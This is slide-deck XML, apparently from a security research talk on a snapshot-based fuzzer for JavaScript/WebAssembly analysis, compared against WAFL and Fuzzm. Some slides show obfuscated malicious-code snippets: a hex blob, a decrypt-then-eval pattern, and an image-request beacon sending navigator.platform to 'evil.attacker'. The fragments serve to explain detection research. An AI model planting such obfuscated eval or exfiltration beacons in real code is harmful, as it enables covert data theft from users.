                <a:gd name="connsiteX1" fmla="*/ 5961498 w 5961498"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 664075"/>
                <a:gd name="connsiteX2" fmla="*/ 5961498 w 5961498"/>
                <a:gd name="connsiteY2" fmla="*/ 664075 h 664075"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 5961498"/>
                <a:gd name="connsiteY3" fmla="*/ 664075 h 664075"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 5961498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1498" h="664075">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5961498" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5961498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Benchmarking against WAFL and </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2600" kern="1200" err="1"/>
                <a:t>Fuzzm</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="2600" kern="12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92C0CAD-8572-E693-A79C-0335AE103C36}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="718631" y="1285340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A02D058-DEDE-D882-004A-6007831768D9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1176640" y="2613064"/>
            <a:ext cx="5754638" cy="914400"/>
            <a:chOff x="1340538" y="3276928"/>
            <a:chExt cx="5754638" cy="8300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EFA9E189-F33E-0D2E-CB69-3CCCBE325713}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1755584" y="3359937"/>
              <a:ext cx="5339592" cy="664075"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 5339592"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 664075"/>
                <a:gd name="connsiteX1" fmla="*/ 5339592 w 5339592"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 664075"/>
                <a:gd name="connsiteX2" fmla="*/ 5339592 w 5339592"/>
                <a:gd name="connsiteY2" fmla="*/ 664075 h 664075"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 5339592"/>
                <a:gd name="connsiteY3" fmla="*/ 664075 h 664075"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 5339592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9592" h="664075">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5339592" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5339592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Slashes false positives by six-fold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AC593D4-0F98-4D26-4857-B22738921740}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1340538" y="3276928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1BA024F-9787-E117-CE54-C8F28461E81C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1194488" y="3940789"/>
            <a:ext cx="5900688" cy="914400"/>
            <a:chOff x="1194488" y="4272722"/>
            <a:chExt cx="5900688" cy="830093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41C9083-2485-6D87-EDD6-A18229EEB63A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1609535" y="4355731"/>
              <a:ext cx="5485641" cy="664075"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 5485641"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 664075"/>
                <a:gd name="connsiteX1" fmla="*/ 5485641 w 5485641"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 664075"/>
                <a:gd name="connsiteX2" fmla="*/ 5485641 w 5485641"/>
                <a:gd name="connsiteY2" fmla="*/ 664075 h 664075"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 5485641"/>
                <a:gd name="connsiteY3" fmla="*/ 664075 h 664075"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 5485641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5641" h="664075">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5485641" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5485641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Snapshots boost code coverage by 46% on average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F53D21F-7FDE-D301-375B-3C00B7118386}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1194488" y="4272722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50AD88D-E7CD-7186-E78C-5CD0FCBE5A6B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="718631" y="5268515"/>
            <a:ext cx="6376545" cy="914400"/>
            <a:chOff x="718631" y="5268516"/>
            <a:chExt cx="6376545" cy="830093"/>
          </a:xfrm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653826F-19BD-7C44-E335-0CB06432D336}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1133678" y="5351525"/>
              <a:ext cx="5961498" cy="664075"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 5961498"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 664075"/>
                <a:gd name="connsiteX1" fmla="*/ 5961498 w 5961498"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 664075"/>
                <a:gd name="connsiteX2" fmla="*/ 5961498 w 5961498"/>
                <a:gd name="connsiteY2" fmla="*/ 664075 h 664075"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 5961498"/>
                <a:gd name="connsiteY3" fmla="*/ 664075 h 664075"/>
                <a:gd name="connsiteX4" fmla="*/ 0 w 5961498"/>
                <a:gd name="connsiteY4" fmla="*/ 0 h 66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1498" h="664075">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5961498" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5961498" y="664075"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="6640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10" tIns="50800" rIns="50800" bIns="508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/>
                <a:t>Outperforms WAFL by three orders of magnitude in execution speed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D69682D-7099-9DD1-57B7-60D8E08C93E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="718631" y="5268516"/>
              <a:ext cx="830093" cy="830093"/>
            </a:xfrm>
            <a:prstGeom prst="ellips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60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0387D-C067-B344-B0FC-33CAD9D4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0604-477B-4C88-F06B-83733C7A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 descr="Ein Bild, das Text, Screenshot, Schrift, Reihe enthält.&#10;&#10;Beschreibung automatisch generiert.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BF1EC3C-3E15-FFF2-89A7-73E90BEB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70" y="1778190"/>
            <a:ext cx="4349885" cy="3301619"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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36CD994-E7F7-2C5A-19D9-514A417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5477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5AB59DD6-3FEA-E501-150A-3EEE1553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2276B7-94F9-2637-BECC-FD999F71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D74C89-02E0-101D-9495-CC2F2C8E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84584-B45A-9DA3-0CFB-1F96FA35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15</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE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Folienzoom 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{200A37FB-9793-C994-7AF8-F215158B08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1544451"/>
                  </p:ext>
                </p:extLst>
              </p:nvPr>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="0" y="0"/>
              <a:ext cx="6096000" cy="3429000"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.microsoft.com/office/powerpoint/2016/slidezoom">
                <pslz:sldZm>
                  <pslz:sldZmObj sldId="507" cId="3756975130">
                    <pslz:zmPr id="{F7940B80-E1A7-4B36-9AA2-6835A5F2AE6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6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Folienzoom 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{200A37FB-9793-C994-7AF8-F215158B08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6096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Folienzoom 13">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3637364E-4D9D-9767-ADCD-0D4B4D9D0E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4484383"/>
                  </p:ext>
                </p:extLst>
              </p:nvPr>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="6091518" y="-1"/>
              <a:ext cx="6095998" cy="3428999"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.microsoft.com/office/powerpoint/2016/slidezoom">
                <pslz:sldZm>
                  <pslz:sldZmObj sldId="580" cId="3256882795">
                    <pslz:zmPr id="{7B716C27-C301-446E-8412-D0BEA1A0B8A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5998" cy="34289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Folienzoom 13">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3637364E-4D9D-9767-ADCD-0D4B4D9D0E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1518" y="-1"/>
                <a:ext cx="6095998" cy="34289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Folienzoom 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F96DE223-50C2-1FF5-5D20-842DA6A502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4167288"/>
                  </p:ext>
                </p:extLst>
              </p:nvPr>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="0" y="3441324"/>
              <a:ext cx="6091518" cy="3426479"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.microsoft.com/office/powerpoint/2016/slidezoom">
                <pslz:sldZm>
                  <pslz:sldZmObj sldId="565" cId="2879949867">
                    <pslz:zmPr id="{FA2FC597-15C4-4427-9EF1-D7DAF5003749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1518" cy="342647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Folienzoom 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F96DE223-50C2-1FF5-5D20-842DA6A502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3441324"/>
                <a:ext cx="6091518" cy="342647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7" name="Folienzoom 26">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D92D3BA-C45C-74C1-DA48-1175711D7D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5119503"/>
                  </p:ext>
                </p:extLst>
              </p:nvPr>
            </p:nvGraphicFramePr>
            <p:xfrm>
              <a:off x="6096000" y="3428998"/>
              <a:ext cx="6087036" cy="3423958"/>
            </p:xfrm>
            <a:graphic>
              <a:graphicData uri="http://schemas.microsoft.com/office/powerpoint/2016/slidezoom">
                <pslz:sldZm>
                  <pslz:sldZmObj sldId="583" cId="4049513782">
                    <pslz:zmPr id="{314D6CA8-5D53-4F80-9C14-C38FC6204D6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87036" cy="34239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7" name="Folienzoom 2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D92D3BA-C45C-74C1-DA48-1175711D7D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6000" y="3428998"/>
                <a:ext cx="6087036" cy="34239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02E26F62-648A-5B4A-99FE-CA7BB5EEAF7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3317914" y="2704341"/>
            <a:ext cx="5353079" cy="15956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/>
              <a:t>Whats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="4400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="4400" dirty="0" err="1"/>
              <a:t>next</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE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91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50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCE1A6A2-5837-24B0-34D0-424E78B0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OnePlus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B4B57-C4BA-FA6C-C9B6-6498988B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FBED9D-BDAD-D51F-D256-A7918A02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776B0F-938B-031A-1A91-A521196A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16</a:t>
            </a:fld>
            <a:endParaRPr lang="de-DE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096E444-5BF5-5767-79E3-EF3BF3D0F6DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4618063" y="1150374"/>
            <a:ext cx="3630142" cy="5125999"/>
            <a:chOff x="4618063" y="1150374"/>
            <a:chExt cx="3630142" cy="5125999"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rechteck: abgerundete Ecken 55">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BEA33DB-1344-5285-2CA6-759B219D010C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4827281" y="1150374"/>
              <a:ext cx="3420924" cy="5125999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9" name="Gruppieren 37">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F4F46F6-239D-1BD0-58B8-D3306D0CDCC4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5033921" y="1490026"/>
              <a:ext cx="3107187" cy="4712163"/>
              <a:chOff x="9257603" y="606346"/>
              <a:chExt cx="2506222" cy="2883773"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Rechteck: abgerundete Ecken 46">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAE02DD6-CE60-0BA3-57FD-171EE7118CDE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9257603" y="606346"/>
                <a:ext cx="2506222" cy="2883773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feld 47">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{69A9D66A-47C2-E3A3-D681-203D9060C11A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="9824111" y="645659"/>
                <a:ext cx="1302584" cy="357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pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Grafik 56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86795AFE-436F-1832-56C1-7980ECE5F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618063" y="1197984"/>
              <a:ext cx="702077" cy="702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3" name="Google Shape;545;p46">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29FC6637-25D1-F3CE-B426-3C9EC5A6CEAC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5248827" y="2372777"/>
              <a:ext cx="2715302" cy="370356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l-PL" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="1A1C1E"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>05060c18270e040c062b1a110d1c3a1e1e0617060d2b041111040d0c06112d3f0f3c2b0504170004111d112b1a0d04110d1d1d1d</a:t>
              </a:r>
              <a:endParaRPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono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D87FBA5-6E9E-7EC8-8E19-42E9FFDA9BB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="205840" y="3807653"/>
            <a:ext cx="4087335" cy="2326007"/>
            <a:chOff x="156680" y="3807653"/>
            <a:chExt cx="4087335" cy="2326007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39D364AB-16D5-2E63-8A38-DC0E1B698429}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="236086" y="4199959"/>
              <a:ext cx="4007929" cy="193370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7E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de-DE" sz="2000" b="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2000" b="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>let</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2000" b="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t> x = </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2000" b="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="accent4"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>decrypt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2000" b="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:effectLst/>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>();</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="de-DE" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>    </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2000" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>eval</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas"/>
                </a:rPr>
                <a:t>(x);</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Consolas"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="16" name="Grafik 15" descr="Ein Bild, das gelb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6E6BCA5A-96CA-F851-83B5-CA9C419E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56680" y="3807653"/>
              <a:ext cx="601907" cy="6331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7" name="Google Shape;545;p46">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8DF92F2F-9ACF-273D-A9C5-68BAFFA1B3D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5150953" y="2272991"/>
            <a:ext cx="2911049" cy="383048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</a:rPr>
              <a:t>new Image().</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r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</a:rPr>
              <a:t>='//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>evil.attacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/?d='+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>navigator.platform</a:t>
            </a:r>
            <a:endParaRPr sz="3200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0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A0F2754-CE1A-D4B2-9368-C59057D6F4FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9165028" y="1798865"/>
            <a:ext cx="2438754" cy="3055702"/>
            <a:chOff x="9165028" y="1798865"/>
            <a:chExt cx="2438754" cy="3055702"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="19" name="Grafik 18" descr="Ein Bild, das Kopierer, Fahren enthält.&#10;&#10;KI-generierte Inhalte können fehlerhaft sein.">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E10DE9C5-17E6-A6BE-512C-156D3A5D0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379222" y="1908681"/>
              <a:ext cx="2083371" cy="2945886"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="Picture 2" descr="https://cdn1.iconfinder.com/data/icons/large-glossy-icons/512/Spy.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89AF45C7-BD1B-9C61-FF20-F440EADE6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028" y="1798865"/>
              <a:ext cx="879797" cy="89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A88BAB5-93ED-48ED-B0AF-9565B159B60D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9238032" y="4331347"/>
              <a:ext cx="2365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/>
                <a:t>eval.attacker</a:t>
              </a:r>
              <a:endParaRPr lang="de-DE" sz="2800" dirty="0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5ACE54C-D2CA-FA5E-D1F4-958F7FE7D641}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="159068" y="535011"/>
            <a:ext cx="4159436" cy="2515337"/>
            <a:chOff x="159068" y="535011"/>
            <a:chExt cx="4159436" cy="2515337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6FEC0230-9819-9F47-12FC-2A578FBED6D0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="236086" y="1116647"/>
              <a:ext cx="4082418" cy="1933701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7E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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="D81B60"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>// ...</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" altLang="de-DE" sz="20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dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="37474F"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>_0x4c</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" altLang="de-DE" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="3F51B5"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>=</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" altLang="de-DE" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="37474F"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" altLang="de-DE" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="388E3C"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>'_</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" altLang="de-DE" sz="2000" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="388E3C"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>a'</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" altLang="de-DE" sz="2000" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="37474F"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>,</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" altLang="de-DE" sz="2000" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="388E3C"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>'_i</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" altLang="de-DE" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="388E3C"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>_‘</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" altLang="de-DE" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="37474F"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>]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000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="37474F"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>_0x4c[</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" altLang="de-DE" sz="2000" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="C53929"/>
                  </a:solidFill>
                  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>0</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="de-DE" altLang="de-DE" sz="2000" dirty="0">
